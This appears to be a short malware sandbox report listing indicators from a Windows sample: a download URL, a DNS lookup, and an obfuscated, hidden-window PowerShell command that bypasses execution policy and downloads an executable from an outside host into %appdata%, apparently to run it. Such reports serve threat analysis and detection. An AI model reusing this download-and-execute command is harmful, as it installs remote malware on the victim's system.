Technical information
- http://real346real.top/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poweRshElL.ExE -EXecUtiONPOlicy bYpASs -NOProFIlE -WindOwsTyle HiddeN (nEw-oBJecT sYSTEM.NET.WebClienT).DowNlOaDFILE('http://real346real.top/search.php','%aPPdAtA%.EXe');stA...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /C "poweRshElL.ExE -EXecUtiONPOlicy bYpASs -NOProFIlE -WindOwsTyle HiddeN (nEw-oBJecT sYSTEM.NET.WebClienT).DowNlOaDFILE('http://real346real.top/search.php','%aPPdAtA%.EXe');stA...' (with a hidden window)